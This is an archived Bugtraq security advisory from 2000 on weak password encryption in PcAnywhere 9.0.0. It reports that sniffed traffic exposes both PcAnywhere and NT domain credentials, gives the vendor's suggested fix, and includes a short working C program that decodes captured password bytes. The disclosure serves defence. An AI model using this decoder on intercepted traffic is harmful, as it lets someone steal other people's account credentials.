[14483] in bugtraq
PcAnywhere weak password encryption
daemon@ATHENA.MIT.EDU (Pascal Longpre)
Thu Apr 6 18:11:02 2000
Message-Id: <20000406030958.23902.qmail@securityfocus.com>
Date: Thu, 6 Apr 2000 03:09:58 -0000
Reply-To: Pascal Longpre <longprep@HOTMAIL.COM>
From: Pascal Longpre <longprep@HOTMAIL.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
PcAnywhere weak password encryption
---- Discussion ----
PcAnywhere 9.0.0 set to its default security value uses a
trivial encryption method so user names and password are
not sent directly in clear. Since most users have the
encryption methods set to either "none" or "PcAnyWhere",
their password are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can
authenticate users based on their NT domain accounts and
passwords. When the user logs on, it is prompted for its NT
username and password. They are then "encrypted" through
the PcAnywhere method and decrypted by the host computer
for validation by the NT domain controller. Someone
snooping on the traffic between the two stations will
unlock both the PcAnywhere and NT account. All that without
even having to go through the L0phtCrack process.
Version 7.0 is not at risk since no encryption is used at
all. Username and password are sent in clear. I haven't
tested version 8 yet.
--- Solution ---
Symantec says that this was not intended to be real
encryption and suggest the use of the Public or Symetric
key option instead. More info can be found at :
http://service1.symantec.com/SUPPORT/pca.nsf/docid/199902231
2571812&src=w
--- Exploit ---
The Username / password are contained in a string two
packets away from the "Enter your login name" and "Enter
your password" prompts. They are preceded by 0x06. The next
number is the string length.
here is the code of the exploit:
#include <stdio.h>
#include <string.h>
void main() {
char password[128];
char cleartext[128];
int i;
// input the sniffed hex values here
// Encrypted example of the 'aaaaa' password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]='\0';
cleartext[0]=0xca-password[0]+0x61;
for (i=1;i<strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;
cleartext[strlen(password)]='\0';
printf("password is %s \n",cleartext);
}
